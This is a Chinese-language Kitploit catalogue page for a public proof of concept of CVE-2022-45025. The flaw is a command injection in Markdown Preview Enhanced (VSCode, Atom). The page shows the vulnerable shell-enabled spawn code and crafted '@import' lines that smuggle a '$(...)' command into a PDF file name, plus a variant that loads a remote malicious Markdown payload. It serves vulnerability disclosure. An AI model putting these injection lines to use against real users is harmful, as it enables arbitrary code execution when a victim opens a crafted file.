Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-45025 — [PoC] 通过Markdown Preview Enhanced (VSCode, Atom) 中的PDF导入实现命令注入 | Kitploit
工具/GitHubGitHub/yuriisanin/cve-2022-45025
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制
GitHubyuriisanin/cve-2022-45025

CVE-2022-45025

[PoC] 通过Markdown Preview Enhanced (VSCode, Atom) 中的PDF导入实现命令注入

查看仓库
881713年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2022-45025

通过PDF导入实现的命令注入漏洞,影响Markdown Preview Enhanced(VSCode,Atom)

描述

Mume Markdown 工具库由于使用带有 {shell: true} 选项的 spawn 命令,存在命令注入漏洞。攻击者可通过诱骗受害者使用 VSCode 或 Atom 打开特制的 Markdown 文件,实现任意代码执行。该库为 VSCode 和 Atom 上的 Markdown Preview Enhanced 插件提供支持。

漏洞代码片段:

root@kitploit:~
const task = spawn(
      "pdf2svg",
      [
        `"${pdfFilePath}"`,
        `"${path.resolve(svgDirectoryPath, svgFilePrefix + "%d.svg")}"`,
        "all",
      ],
      { shell: true },
    )

概念验证

以下 Markdown 文档允许攻击者执行任意命令:

root@kitploit:~
@import "$(open -a Calculator > /dev/null | exit 0)hello.pdf"

以下注释将被 MPE 识别为有效的 "@import" 命令:

<!-- @import "$(open -a Calculator > /dev/null | exit 0)hello.pdf" -->

或者,也可以从外部来源加载 payload:

root@kitploit:~
<!-- @import "https://raw.githubusercontent.com/yuriisanin/CVE-2022-45025/main/examples/malicious.md" -->

针对 VSCode 和 Atom 的 DEMO 视频可在 YouTube 观看。

vscode-rce-poc-gif

支持

您可以在 Twitter、GitHub 或 YouTube 上关注我。

下载工具